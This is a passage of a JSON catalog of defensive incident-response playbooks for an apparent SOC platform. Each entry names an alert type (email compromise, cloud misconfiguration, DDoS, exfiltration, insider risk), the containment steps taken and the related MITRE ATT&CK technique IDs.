"stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-inbox-rule-malicious.playbook.json" }, { "id": "bec-token-theft-v1", "type": "playbook", "name": "BEC: M365 / Workspace Token Theft", "description": "Triggered when a refresh token is observed from a new ASN with no interactive sign-in. Revokes refresh tokens and forces MFA.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "identity", "token-theft" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1539" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-token-theft.playbook.json" }, { "id": "bec-vendor-payment-redirect-v1", "type": "playbook", "name": "BEC: Vendor Payment Redirect \u2014 Freeze", "description": "Triggered when a vendor banking detail change happens via email. Freezes pending payments and pages CFO.", "version": "1.0.0", "author": "AiSOC", "tags": [ "bec", "bec", "finance" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "bec", "mitre_techniques": [ "T1565.001" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/bec/bec-vendor-payment-redirect.playbook.json" }, { "id": "brute-force-lockout-v1", "type": "playbook", "name": "Brute Force: Account Lockout and Source Block", "description": "Triggered by detection of repeated failed authentication attempts (password spray, credential stuffing, RDP/SSH brute force). Locks out the targeted account, blocks the source IP, and triggers investigation.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "brute-force", "credential-stuffing", "password-spray", "authentication" ], "severity": "critical", "trigger": "alert", "steps": 10, "category": "brute-force", "mitre_techniques": [ "T1110", "T1110.001", "T1110.003" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/brute-force/brute-force-lockout.playbook.json" }, { "id": "cloud-ato-response-v1", "type": "playbook", "name": "Cloud ATO: Compromised Cloud Account Response", "description": "Triggered by anomalous API activity, impossible travel, or cloud CSPM alert indicating a compromised cloud account. Revokes active sessions, rotates credentials, preserves audit trail, and notifies cloud security team.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "cloud-account-takeover", "cloud", "iam", "identity" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "cloud-account-takeover", "mitre_techniques": [ "T1078.004", "T1535" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-account-takeover/cloud-ato-response.playbook.json" }, { "id": "cloud-azure-blob-public-v1", "type": "playbook", "name": "Cloud: Azure Blob Container Public", "description": "Triggered when an Azure Storage container is set to public. Reverts to private and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "azure", "storage" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1530" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-azure-blob-public.playbook.json" }, { "id": "cloud-cloudtrail-disabled-v1", "type": "playbook", "name": "Cloud: CloudTrail Disabled \u2014 Re-enable", "description": "Triggered when a CloudTrail trail is stopped. Restarts trail and audits API calls in the dark window.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "logging" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1562.008" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-cloudtrail-disabled.playbook.json" }, { "id": "cloud-cross-account-trust-v1", "type": "playbook", "name": "Cloud: Unexpected Cross-Account Trust", "description": "Triggered when a role trust policy adds an external account ID not on the allow-list. Revokes and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "iam" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1078.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-cross-account-trust.playbook.json" }, { "id": "cloud-gke-anonymous-v1", "type": "playbook", "name": "Cloud: GKE Cluster Anonymous Auth", "description": "Triggered when GKE cluster is configured to allow anonymous Kubernetes API access. Disables anonymous and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "gcp", "kubernetes" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1190" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-gke-anonymous.playbook.json" }, { "id": "cloud-iam-overpriv-v1", "type": "playbook", "name": "Cloud: Over-Privileged IAM \u2014 Detach & Review", "description": "Triggered when IAM Access Analyzer flags an over-privileged role. Detaches the policy and opens an owner-review ticket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "iam" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1078.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-iam-overpriv.playbook.json" }, { "id": "cloud-key-leak-v1", "type": "playbook", "name": "Cloud: Cloud Access Key Leaked", "description": "Triggered when a long-lived access key is found in a public repo or paste site. Rotates the key and scans for downstream use.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "secrets" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "cloud-misconfig", "mitre_techniques": [ "T1552.001" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-key-leak.playbook.json" }, { "id": "cloud-mfa-disabled-root-v1", "type": "playbook", "name": "Cloud: Root Account MFA Disabled", "description": "Triggered when root MFA is disabled. Re-enables MFA and pages the cloud-platform owner immediately.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "iam", "mfa" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1556" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-mfa-disabled-root.playbook.json" }, { "id": "cloud-rds-public-v1", "type": "playbook", "name": "Cloud: RDS Instance Publicly Accessible", "description": "Triggered when an RDS instance toggles to publicly accessible. Removes public access and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "rds" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1190" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-rds-public.playbook.json" }, { "id": "cloud-s3-public-v1", "type": "playbook", "name": "Cloud: S3 Bucket Public \u2014 Re-private & Audit", "description": "Triggered by `s3-public-bucket` detection. Sets bucket private, enables Block Public Access, and audits last 7d access logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "s3" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "cloud-misconfig", "mitre_techniques": [ "T1530" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-s3-public.playbook.json" }, { "id": "cloud-security-group-open-v1", "type": "playbook", "name": "Cloud: Security Group Opens 0.0.0.0/0", "description": "Triggered when a security group rule allows ingress from 0.0.0.0/0 to a sensitive port. Closes the rule and audits the change.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "network" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1190" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-security-group-open.playbook.json" }, { "id": "container-escape-response-v1", "type": "playbook", "name": "Container Escape: Runtime Breach Response", "description": "Triggered by container runtime security alert (Falco, Sysdig, or similar) indicating a container escape attempt or successful breakout to the host. Kills the offending container, isolates the node, and preserves evidence.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "container-escape", "container", "kubernetes" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "container-escape", "mitre_techniques": [ "T1611", "T1610" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/container-escape/container-escape-response.playbook.json" }, { "id": "ddos-amplification-dns-v1", "type": "playbook", "name": "DDoS: DNS Amplification", "description": "Triggered when an inbound spike of crafted DNS queries hits an authoritative server. Sinkholes spoofed sources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "dns" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "ddos", "mitre_techniques": [ "T1498.002" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-amplification-dns.playbook.json" }, { "id": "ddos-app-layer-l7-v1", "type": "playbook", "name": "DDoS: Application Layer L7", "description": "Triggered by anomalous L7 request rate or pattern. Engages WAF rate-limit rule and challenge-page.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "waf" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "ddos", "mitre_techniques": [ "T1498.001" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-app-layer-l7.playbook.json" }, { "id": "ddos-credential-stuffing-fraud-v1", "type": "playbook", "name": "DDoS: Auth-Endpoint Credential Stuffing", "description": "Triggered when /login takes a sustained spike of failed attempts. Combines DDoS + credential-stuffing response: WAF challenge, rate-limit, source-IP block.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "ato" ], "severity": "high", "trigger": "alert", "steps": 6, "category": "ddos", "mitre_techniques": [ "T1110.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-credential-stuffing-fraud.playbook.json" }, { "id": "ddos-syn-flood-v1", "type": "playbook", "name": "DDoS: SYN Flood", "description": "Triggered by SYN flood pattern at edge. Enables SYN cookies and increases backend capacity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "network" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "ddos", "mitre_techniques": [ "T1498" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-syn-flood.playbook.json" }, { "id": "ddos-volumetric-l3-v1", "type": "playbook", "name": "DDoS: Volumetric L3/L4", "description": "Triggered by volumetric flood detection at edge. Engages scrubbing provider and pages on-call.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "network" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "ddos", "mitre_techniques": [ "T1498" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-volumetric-l3.playbook.json" }, { "id": "endpoint-isolation-response-v1", "type": "playbook", "name": "Endpoint Isolation: EDR-Driven Host Quarantine", "description": "Triggered when an endpoint requires emergency isolation due to confirmed or high-confidence compromise (ransomware spread, active C2 communication, lateral movement staging). Uses EDR to network-isolate the host while preserving management connectivity, collects forensic artifacts, and notifies the SOC.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "endpoint-isolation", "edr", "quarantine", "host-isolation" ], "severity": "critical", "trigger": "alert", "steps": 11, "category": "endpoint-isolation", "mitre_techniques": [ "T1562.001", "T1204", "T1486" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/endpoint-isolation/endpoint-isolation-response.playbook.json" }, { "id": "exfil-archive-egress-v1", "type": "playbook", "name": "Exfil: Archive File Egress (.zip / .7z / .rar)", "description": "Triggered when a host uploads an archive to an external dest. Holds the file in DLP review queue and notifies user's manager.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "dlp", "archive" ], "severity": "high", "trigger": "alert", "steps": 5, "category": "data-exfil", "mitre_techniques": [], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-archive-egress.playbook.json" }, { "id": "exfil-dns-tunneling-v1", "type": "playbook", "name": "Exfil: DNS Tunneling", "description": "Triggered by high-entropy DNS query length on a host. Sinkholes the suspect domain and isolates the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "dns" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "data-exfil", "mitre_techniques": [ "T1071.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-dns-tunneling.playbook.json" }, { "id": "exfil-large-upload-v1", "type": "playbook", "name": "Exfil: Large Outbound Upload", "description": "Triggered when a host uploads >X GB to a non-corporate destination in a short window. Blocks destination and investigates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "dlp" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "data-exfil", "mitre_techniques": [ "T1567" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-large-upload.playbook.json" }, { "id": "exfil-personal-cloud-v1", "type": "playbook", "name": "Exfil: Personal Cloud Storage Upload", "description": "Triggered when corporate data uploads to a personal cloud (personal Drive, Dropbox, iCloud). Blocks dest, manager notify.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "saas" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "data-exfil", "mitre_techniques": [ "T1567.002" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-personal-cloud.playbook.json" }, { "id": "exfil-removable-media-v1", "type": "playbook", "name": "Exfil: Sensitive Data to Removable Media", "description": "Triggered when a sensitive file is written to a USB volume. Blocks USB writes via EDR policy and opens a ticket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "endpoint", "usb" ], "severity": "medium", "trigger": "alert", "steps": 4, "category": "data-exfil", "mitre_techniques": [ "T1052" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-removable-media.playbook.json" }, { "id": "ids-critical-response-v1", "type": "playbook", "name": "IDS/IPS Critical Alert: Network Intrusion Response", "description": "Triggered by an IDS/IPS signature at critical severity indicating active exploitation, C2 communication, or lateral movement detected at the network layer. Enriches source IP, blocks traffic, and escalates.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "ids-critical", "ids", "ips", "network", "intrusion" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "ids-critical", "mitre_techniques": [ "T1046", "T1190", "T1071" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ids-critical/ids-critical-response.playbook.json" }, { "id": "insider-after-hours-access-v1", "type": "playbook", "name": "Insider: Anomalous After-Hours Access", "description": "Triggered when a user accesses sensitive systems outside their normal pattern. Step-up MFA and log for HR review.", "version": "1.0.0", "author": "AiSOC", "tags": [ "insider-risk", "insider", "anomaly" ], "severity": "medium", "trigger": "alert", "steps": 4, "category": "insider-risk", "mitre_techniques": [ "T1078" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/insider-risk/insider-after-hours-access.playbook.json" }, { "id": "insider-mass-download-v1", "type": "playbook", "name": "Insider: Mass File Download", "description": "Triggered when a single user downloads >N files from a sensitive store in N hosts in